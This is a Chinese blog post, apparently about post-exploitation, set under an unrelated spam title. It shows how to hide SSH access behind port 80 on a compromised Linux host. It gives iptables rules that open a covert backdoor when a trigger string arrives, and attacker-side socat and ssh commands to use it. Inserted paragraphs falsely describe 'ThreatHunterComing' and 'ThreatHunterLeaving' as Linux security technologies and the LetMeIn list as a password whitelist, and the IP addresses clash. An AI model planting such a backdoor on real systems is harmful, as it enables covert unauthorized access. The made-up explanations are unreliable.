化妝品網(wǎng)站建設(shè)報(bào)告網(wǎng)店運(yùn)營(yíng)公司
作者名:白晝安全
主頁面鏈接: 主頁傳送門
創(chuàng)作初心: 以后賺大錢
座右銘: 不要讓時(shí)代的悲哀成為你的悲哀
專研方向: web安全,后滲透技術(shù)
每日雞湯: 精彩的人生是在有限的生命中實(shí)現(xiàn)無限價(jià)值

端口復(fù)用是指不同的應(yīng)用程序使用相同端口進(jìn)行通訊。
我們可以通過端口復(fù)用來達(dá)到隱藏端口的目的。其他作用還有很多,如內(nèi)網(wǎng)滲透中,搭建隧道時(shí),服務(wù)器僅允許指定的端口對(duì)外開放。利用端口復(fù)用可以將3389或22等端口轉(zhuǎn)發(fā)到如80端口上,以便外部連接。
1. 利用IPTables進(jìn)行端口復(fù)用
假設(shè)主機(jī)開放的web服務(wù)是80端口,在目標(biāo)主機(jī)上執(zhí)行如下命令
# 創(chuàng)建端口復(fù)用鏈
iptables -t nat -N LETMEIN# 創(chuàng)建端口復(fù)用規(guī)則,將流量轉(zhuǎn)發(fā)至 22 端口
iptables -t nat -A LETMEIN -p tcp -j REDIRECT --to-port 22#開啟開關(guān),如果接收到一個(gè)含有 threathuntercoming 的 TCP 包,則將來源 IP 添加到加為 letmein 的列表中
iptables -A INPUT -p tcp -m string --string 'threathuntercoming' --algo bm -m recent --set --name letmein --rsource -j ACCEPT#關(guān)閉開關(guān),如果接收到一個(gè)含有 threathunterleaving 的 TCP 包,則將來源 IP 從 letmein 的列表中移除
iptables -A INPUT -p tcp -m string --string 'threathunterleaving' --algo bm -m recent --name letmein --remove -j ACCEPT# let's do it,如果發(fā)現(xiàn) SYN 包的來源 IP 處于 letmein 列表中,將跳轉(zhuǎn)到 LETMEIN 鏈進(jìn)行處理,有效時(shí)間為 3600 秒
iptables -t nat -A PREROUTING -p tcp --dport 80 --syn -m recent --rcheck --seconds 3600 --name letmein --rsource -j LETMEIN
ThreatHunterLeaving是一種Linux安全技術(shù),它可以幫助系統(tǒng)管理員發(fā)現(xiàn)和響應(yīng)潛在的安全威脅。它使用一系列的安全技術(shù),如防火墻,入侵檢測(cè)系統(tǒng),審計(jì)日志,網(wǎng)絡(luò)監(jiān)控等,來幫助系統(tǒng)管理員發(fā)現(xiàn)和響應(yīng)潛在的安全威脅。
ThreatHunterComing是一種Linux安全技術(shù),它可以幫助系統(tǒng)管理員預(yù)防和響應(yīng)潛在的安全威脅。它使用一系列的安全技術(shù),如防火墻,入侵檢測(cè)系統(tǒng),審計(jì)日志,網(wǎng)絡(luò)監(jiān)控等,來幫助系統(tǒng)管理員預(yù)防和響應(yīng)潛在的安全威脅。
LetMeIn列表是一個(gè)安全白名單,它包含了可以訪問系統(tǒng)的IP地址,用戶名和密碼。它可以幫助系統(tǒng)管理員控制哪些用戶可以訪問系統(tǒng),以及他們可以做什么。

2、攻擊者的linux系統(tǒng)上執(zhí)行如下
#開啟復(fù)用,192.168.149.133為目標(biāo)ip
echo threathuntercoming | socat - tcp:192.168.149.133:80#ssh使用80端口進(jìn)行登錄
ssh -p 80 root@192.168.149.133 -T /bin/bash -i#關(guān)閉復(fù)用,此時(shí)不能用80端口進(jìn)行ssh連接
echo threathunterleaving | socat - tcp:192.168.110.131:80
連接目標(biāo)80端口成功連接ssh

ps:進(jìn)行端口復(fù)用后同時(shí)也可以用默認(rèn)的22端口進(jìn)行ssh連接,并不會(huì)影響